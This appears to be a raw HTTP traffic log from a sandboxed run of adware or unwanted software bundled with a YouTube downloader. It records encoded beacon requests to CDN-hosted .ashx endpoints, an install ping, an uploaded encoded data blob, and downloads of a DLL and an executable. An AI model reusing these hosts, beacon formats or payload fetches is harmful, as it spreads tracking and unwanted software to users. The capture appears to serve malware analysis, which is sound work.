HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:53 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=QHucCbLl /arv6GrtwjWz3Ryfx22RDGQfNujG4MuC7j UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwUjBc8MQwUMZYYsZ7QYFDFnxHXZjfhFnaKOBvq/txek 98kq5tFPGRg8hLIAT6TbharyaFrt1ZytQQr15Tmip jZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:53 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXeP7nOBaVPXWjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:53 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /p.ashx?e=b1dRW7RxYKcVc8R/SQUwTCKczBAo4NGUZFSq 7rn0cUUMN9W/ 8fb24W0T1hU8VMkYIKgNqWBwS9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWP9XPbJELwvM4ER/zOphe9XjDyrjfLHdhwq6l7mVDuU2U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhStCC/vmINmoCk0XByrlXk6Xa2GUTuqDbKtCUHeR8YCF3Kke2ijo/txBIBrCYEM0Ntm0iRlndgoD0 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:50 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _-jVsp-RPqhIQOYRiAalyn1cpdVQ00_pIt3HRQj4BN8-RuhJjKVHaQ==



GET /p.ashx?e=I6hFHi0H7G9mS6nlSU/NTuiRTIWym4 0QVpVqTl5/e5zgOiYPM 1xJkMnbu79FzppzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL4bkGQrvUopTfauHCM4PoUS28zA03xwxN7DRdbCExQ3XkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mdulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hTfh8cjilZ M3GKWlWmZ3GY= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:51 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: C87qPcvXASVAYX3gxUBieuzAATP7FqRH-qwkYRi36v_ra2vMe98Usw==


GET /app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=&rnd=&v=1.0.11487.1216&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: VVV.ytdownloader.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:49 GMT


GET /p.ashx?e=hWfaA75NtHH85nz5m58wW3Ryfx22RDGQQn7xBp tRz8r4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AefUXC4FfWEqIYCpHZc9ZUaF7EORqfQiLE44G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:41 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CxYQHkqjMaJ7zyl9dwBLRkJryFnTIRBtcXz5IiKcA90n0nfhvlE6oA==



GET /p.ashx?e=aQQpsP6/AW3kex8By7Tt8zRFyso9cgVYusz/yP3Ks9EegceCn LKWe/lQO2eO0N8r J80GV4qARlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJQzpy6nz8DG6TnR9dT7ayg3fHrFM BTebXDbzJkSidOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhSpFgjcTf6rNyqUVvKp9Lg9XHvdM54V2LCI4G r 3F6T7NPnGVVVl/P0B6w5tb RMu8qEoEbTUKVP HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:41 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: IqTBvUrNaIHnrdYGzsyMY-HM6vkhOQkotn97uw3khH2c9DOrAWQ-hg==


POST /br.ashx?pid={PID}&aid={AID}&bur=1&ss=0&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&md5=c9201ba296c08848dfd3d5e86b7c34eb&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=8AD3F1FB-4DE5-44BF-9F6B-81BABBE96DC1 HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
Host: d23ocewf5ttxmu.cloudfront.net
Content-Length: 2326
Connection: Keep-Alive
Pragma: no-cache

d=noFdkUddx2Ym7UPApfAaZEVm2P NUcLjYAQ4rsxYlBNPUjW0PyWC z8qaWAtZCrC Lk0d9NV/LXL8gpw81FPFTkpuoGloLadURaiFAYMXj9TIZLWOQ56ZIKHXLr1Ggkc4SggPfc/tFcn3RxyzL60O2gJLpT1SeQuEqKtswrM0VrPdHlXp7UiA4zOL2q4Fkfw8z43pdMpkxN/CIW5/mcnnqjNppTBnFw 6sxpdMC7yXDb9t lw FT5g2kPinz RVopKhL43FjyOXK4Do62Wm I5D52bKRA M13nMDs26fBDaJztU47YAZTQKCtzgk NcN39/Gotw1JC4mG EL81gDxjL6Xi7zM8x7rzCrSs9w96HhShFl lsntOW7bo34Mw90rO2B49rVJgThpkPlg1HLrrxIdHaOiO g/MhXnfLUwPdBatNeMImDmaHENSW2gXy4I4q/XtQXqZHIeZrHGUpqQagX4AwSpxPq1xH6jcD3ATOUccztVAi5CChaMLOUZIlyfJaZVe9Pd36Pns8Ndl2AfjW4xDjn4iJN9NzDyhqAuhg1g3g9TrkcAwkxItUGigkOPx1e qPinMe13xrXBvmKMbLKFYILdkcokBWNZi4qZAhnfwgfDvIWLn6FjeoY5CAT7OoPCwQ5bA5nvYbfIetCoF0EK7qHCSVe5VzAWK0z8BJ7RG4IB96TVO0vqxdgqhxScr1ieLuYl70qam6q6ZG1r51TAEPCW5 ePmahp35X1feIPGdeGe5Ht2TbVi1uBevberBNJDGQyGKexp4a9nEX/39/YUozL/OM3rR7jtQjqEtPlg8Z66SiZ6h8Y5EBWt3U7RQ/p/K6obKOx/WQ7J6JImLOo4YX1gsYI7GdmuKlDxnu1hzcmlA66ErzoOIYN/lU4ROu9iTGt6jt9dmK8ZXFNDV9PszgHQJ0tCUtAVUDNLCi6LakrhREPRsGWKuyBHivbBjJ7TtRWNkz4cUa7h9kUtrFmJh2Sih8uqwSMjKabStVLC88BFJetXR2lD9/IPoqFF0CdRj7iCgy2jhROFW5fFStvoSP7uN3fchauycQ7KKN5Le
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private,no-cache, no-store
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:27:23 GMT
X-Cache: Miss from cloudfront
Via: 1.1 ad1289c08e15a848e5c2bc019529785a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: VnmrBMeLjfsIhbDlYawLTgarkgrabHuQCcU-9nWq_SWd7_EmB7DG9Q==


GET /wu.ashx?dsid=1&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
Host: pwvz71qp-ur1xo6pn.netdna-ssl.com
Pragma: no-cache


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:53 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2116
Connection: close
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS

<<< skipped >>>

GET /bxsdk32.dll HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dyd9qf154h76q.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 942080
Connection: keep-alive
Date: Mon, 17 Aug 2015 04:34:01 GMT
Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT
ETag: "05c47da12b0009bd98653f51287f7768"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8078
X-Cache: Hit from cloudfront
Via: 1.1 1fcd1033bfe42d3b0b03eb4bfbf9624a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ijjcwct3kqK2knKU-KTKffnR7QRUWQ--8MJp4G4SCde9iMkFcB_8Jw==

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 28 Jul 2015 22:15:32 GMT
Content-Range: bytes 0-249999/520704
Age: 2540
X-Cache: Hit from cloudfront
Via: 1.1 e13dc20cb35881b25fb296fb0383f55c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 1PX3I5rgiKe3PsQbbZmF8MzwSrH8iNhGE5ztCJCaEAH2nzz0EwMLtw==

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=500000-520703
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 20704
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 28 Jul 2015 22:15:32 GMT
Content-Range: bytes 500000-520703/520704
Age: 2540
X-Cache: Hit from cloudfront
Via: 1.1 e13dc20cb35881b25fb296fb0383f55c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: nJY9Xf3c33ndIQmbIFupbzVsGbKyM6x38lyLwu57NdJ0DjmgKw3OLQ==

<<< skipped >>>

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWKnmGGYVS7/B0JQd5HxgIXfmCWsTLnvD bTtF4P/Nzf47au 4j4gnPlTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWFDwWd9hvLDxFAL52sIXt4XaiLHqwXs5rj3ZLnbsoZ9zX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWDz0zfD6NQ4eEwAaRG2pHiUPesst1ukiDgCtEn0QpjuXhJ1Bh5YeUQcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGKotwKW5Oqogj9wXQw f3NHANGpOWwcxYTkg3eP0fa/4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWL9PKObAHk8Ms IILilpWF0oVqJUL9ojcMbrniShQ3GQLdA rHOtLvrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3Nykvipxs5XxNmVl HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWI5PPWYBcW8Gs IILilpWF3nW9YwSk5gj28Va7JmIs/Bl13yhrpfYAMeIGfrzyWRyvy2gKbXyPPDXUoXAX2Uiz3W6sPFKrniCyxamEHwe AYLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOSp LYLDcsF6Odloy4EgwsaMMPQ SS4HkA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/XpciovEgse2DHUe356ADpreizXIw2lEXuAG0Hn6RhSl2loKLeLycAJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AmkdnXmY5ntEg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=WVbe3wHlwMEinMwQKODRlCGn4C mEEfxIM0CqmsRfbtxTYwWxYG9WEEY41XBMtFk/h9mchShIbSrOSgjjO/wQWUl0xzv/1Q131fTgrR12XxM0RSkMVjMOymF904v4t2DZ0d7GEGeHAhiVQeEeICkE1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFmOdeW8Cm Pw= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA5Mtw6p9U5dKYX3Ti/i3YNxO48S9k5zx0ojLX6lvBJsJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWE5IN3j9H2v HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=Qoli4LW15gtmS6nlSU/NTiWcJxQhCNYt/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVNIPaRbv9tSE6xlJd0h7/gd1mHzxcGoQX HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWM xh4nuC6oveZAqHIGghM2z4gguKWlYXaO/XErhxliTI9uQqrKZfxIBT7frdp7JezUCjI61UkiTnkgV 4XZT5z4ClmOKwA5tjnHHb7mscIVgbV/yvdriMjwaA8tF5WGLnyvcuu3n6aLNNw5 xDHzYgoVew2AB1B6dSM4OFarGdJKBIumnxm9gbppvl9R6 WhvM9KvXHlNP117c3Fngy/YiYglFcV1P8JUJcm/l/xEvxA6V8R1oJo7qvahkwjxcRjGnDU1S tLbCq4B1iQWYNnk5MTeqccPPQKdfW31f15HrC/m74 efuIFAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcbDfhe8VxCPz HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:40 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA2yDM6d7piii11NaYYxcNku1SXIq07tJg ABjx4/MVnPaT JG0G pPE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:40 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWKv9x4TEPS62BPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:40 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVYckYBBdXIKfLCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN3VAezdf3aKUZ1oPXyDmfKJGv4KmdiE6A0YxIyJifn4/20i04rg0GqU6QUZ3iN538P2DINu3lc8z4xvUpY0xunjjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:40 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=M7A8vgjJHrjHEQ/kk/2L9nRyfx22RDGQOvHY8s4Kk0v UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwV195BE3C 03zdJAJ5fHVMItQhIsImUWq6XgKdYL4Li8dDmJkgzV7sEdFuCUHWPT9JluevdybjIM/AF/Crll2X X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:41 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
